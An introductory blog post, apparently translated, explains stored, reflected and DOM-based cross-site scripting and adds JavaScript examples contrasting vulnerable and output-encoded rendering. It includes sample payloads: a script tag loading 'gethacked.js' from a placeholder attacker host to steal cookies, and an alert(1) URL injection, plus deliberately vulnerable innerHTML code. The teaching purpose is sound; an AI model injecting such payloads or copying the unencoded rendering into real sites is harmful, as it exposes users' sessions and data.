XSS for Dummies: Injection Attack Series

What the heck is Cross Site Scripting (XSS)?

Well, OWASP, one of my go-to sites for information, defines XSS as a

“type of injection, in which malicious scripts are injected in otherwise benign and trusted websites.”

(https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))

So, what does that mean? Basically, it’s a sequence of instructions that sends malicious code to the user of the web application in the form of a browser-side script. The user’s web browser has NO idea that it’s bad code and thinks it’s coming from a trusted website.

What can an attacker get from XSS? Attackers are trying to get something that benefits them, so they can access session tokens, cookies, and much more information that no one wants the whole universe to know about.

There are two types of XSS:

Server XSS and Client XSS

(https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting)

Server XSS consists of Stored XSS, and Client XSS consists of Reflected and DOM Based XSS.

Stored XSS: What is it and why is it even important to know?

Let’s say you’re adding a comment on a book club blog to someone who reviewed a book that you want to read. An attacker can post a comment that says “Hey, I have a bundle deal for the four books in so-and-so website.. <script src="*enter so-and-so.com/gethacked.js*"></script>”. Once you, as the interested user, click that URL, a JavaScript file will activate, gathering the user’s cookies and session tokens for the blog and accessing sensitive information stored in the user’s account, like address, credit card information if there’s a monthly subscription, and so much more. This affects everyone who visits the page because the link will always be there.

Reflected XSS: What about this?

A perfect example of this attack is spam emails. Let’s say there’s a vulnerability where a script can be passed in a trusted website’s URL. www.page.com/page1?home.html would bring up the home page of whatever website, but let’s say the URL is www.page.com/page1?<script>alert(1)</script>. With this URL, once the user presses enter, the JavaScript will execute, causing a pop-up of an error message with 1 on it. Now an attacker, with their out-of-the-box thinking, can make a script that gets information from users once the user clicks on the link.

The difference between Reflected XSS and Stored XSS is that Stored XSS is saved onto the server. Going back to my example, because there is a database of saved comments and reviews, the attacker’s comment is saved regardless of whether the user refreshes the page, whereas with Reflected XSS a user has to go to the page in order for the attack to be executed.
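
The stored comment and the reflected URL above fail in the same place: untrusted text is written into the HTML response without output encoding. The sketch below is an added example, not code from the original post; it renders both cases with and without encoding, and its function names, the so-and-so.example host and the sample comments are assumptions made for illustration.

```javascript
// Added example. Function names and sample values are constructed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that let text break out of element content
// or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Stored case: comments are read back from the database and written
// into the page that every visitor receives.
function renderComments(comments, encode) {
  return comments
    .map((c) => `<li><b>${encode(c.author)}</b>: ${encode(c.text)}</li>`)
    .join('\n');
}

// Reflected case: the value arrives in the request URL and is echoed
// back in the same response.
function renderPage1(requestUrl, encode) {
  const query = decodeURIComponent(new URL(requestUrl).search.slice(1));
  return `<p>You asked for: ${encode(query)}</p>`;
}

const raw = (value) => String(value); // no encoding: the vulnerable form

// Constructed sample data, modelled on the two examples in the text.
const SAMPLE_COMMENTS = [
  { author: 'reader42', text: 'Loved this review!' },
  { author: 'dealz', text: 'Hey, I have a bundle deal for the four books. ' +
      '<script src="https://so-and-so.example/gethacked.js"></script>' },
];
const SAMPLE_URL = 'http://www.page.com/page1?<script>alert(1)</script>';

console.log(renderComments(SAMPLE_COMMENTS, raw));        // script tag reaches the page as markup
console.log(renderComments(SAMPLE_COMMENTS, escapeHtml)); // same text arrives as inert characters
console.log(renderPage1(SAMPLE_URL, raw));
console.log(renderPage1(SAMPLE_URL, escapeHtml));
```

This encoding covers HTML element content and quoted attribute values only; text placed inside a script block, a URL attribute or a style needs the encoding for that context.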

Lastly, DOM Based XSS: What else could there be?

Let’s say there’s a form that uses the user’s input to manipulate the DOM of the website. The form asks for a First Name and a Last Name, and once the user presses enter, the website brings up a “Hello *first name*!” So we know there’s JavaScript in the source that shows the user’s First Name input. As an attacker, what they can do is enter a malicious script to gather any type of information, like cookies and session tokens. With DOM based XSS, this isn’t shown in the source/HTML code of the website because it is taken from what the user is inputting.
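
The “Hello *first name*!” greeting above, written once with a markup-parsing sink and once with a text-only sink. This is an added example, not code from the original post; greetUnsafe, greetSafe and the FakeElement stand-in are assumptions so that the file also runs outside a browser.

```javascript
// Added example. All names below are constructed for illustration.

// Vulnerable form: the name is concatenated into a string and assigned
// to innerHTML, so whatever the user typed is parsed as HTML.
function greetUnsafe(target, firstName) {
  target.innerHTML = 'Hello ' + firstName + '!';
}

// Hardened form: textContent creates a text node; the input is never
// handed to the HTML parser.
function greetSafe(target, firstName) {
  target.textContent = 'Hello ' + firstName + '!';
}

// Constructed stand-in for a DOM element so the example runs under Node.
// It models one real DOM behaviour: text assigned through textContent
// reads back from innerHTML entity-encoded.
class FakeElement {
  constructor() { this._html = ''; }
  get innerHTML() { return this._html; }
  set innerHTML(markup) { this._html = String(markup); }
  set textContent(text) {
    this._html = String(text)
      .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
  }
}

// Run both forms on the same input and return what each element holds.
function demo(firstName) {
  const unsafeEl = new FakeElement();
  const safeEl = new FakeElement();
  greetUnsafe(unsafeEl, firstName);
  greetSafe(safeEl, firstName);
  return { unsafe: unsafeEl.innerHTML, safe: safeEl.innerHTML };
}

// In a browser the target would be a real element, for example:
//   greetSafe(document.getElementById('greeting'), form.firstName.value);
console.log(demo('Ana'));
console.log(demo('<script>alert(1)</script>')); // sample input taken from the text
```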

Please keep in mind that my examples aren’t the only way these XSS attacks can be performed; there are many more ways to attack users using these methods. One just has to be very creative and think outside the box.

Translated from: https://medium.com/@vanessamorales.1023/xss-for-dummies-injection-attack-series-fc4bcdd557d7
